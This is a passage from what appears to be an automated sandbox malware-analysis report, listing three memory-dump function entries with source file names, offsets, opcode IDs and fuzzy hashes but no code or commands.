                                          • Source File: 00000009.00000002.4547622475.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4d60000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c02c92558dbb4efde01ada30c08c33167cd49e3c66ddc8a1d746bbcff1d55c0
                                          • Instruction ID: 8c11865f8735858e0f19e718d16e4960a8492de19030a8edc324ff6900cd337d
                                          • Opcode Fuzzy Hash: 4c02c92558dbb4efde01ada30c08c33167cd49e3c66ddc8a1d746bbcff1d55c0
                                          • Instruction Fuzzy Hash: 4BC080F45002005FD3048B34CC4456B79E3EFDC301F51C419510586168C974C940D6A0
                                          Function 04D68DB0 Relevance: .0, Instructions: 7COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4547622475.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4d60000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c10757f8816499232a61853589838d1896b62369f66a8813259562acbb272a5
                                          • Instruction ID: 7a114ca3d8db9e42effe79960d9cfad0670e9693fee6c3f6a542930ea0919acc
                                          • Opcode Fuzzy Hash: 4c10757f8816499232a61853589838d1896b62369f66a8813259562acbb272a5
                                          • Instruction Fuzzy Hash: D5B0123005020D4FCD406B78F50AD443B2DFA402047402231B50C06415AFAC78098798
                                          Function 04D699D8 Relevance: .0, Instructions: 7COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4547622475.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4d60000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ebdf1d183f327ad6c708c71a0b1e04e87d6ff160b7f26a6d7f964499a0fd56d
                                          • Instruction ID: 6b7afb69b5b33b6176a43e69a7898fc4c241700c653303fd83d0631d461cbc8b
                                          • Opcode Fuzzy Hash: 7ebdf1d183f327ad6c708c71a0b1e04e87d6ff160b7f26a6d7f964499a0fd56d
                                          • Instruction Fuzzy Hash: 06B0123004030D4FCD006B54F94B9153F1DF9803047801531B50D070259EBCA81487C4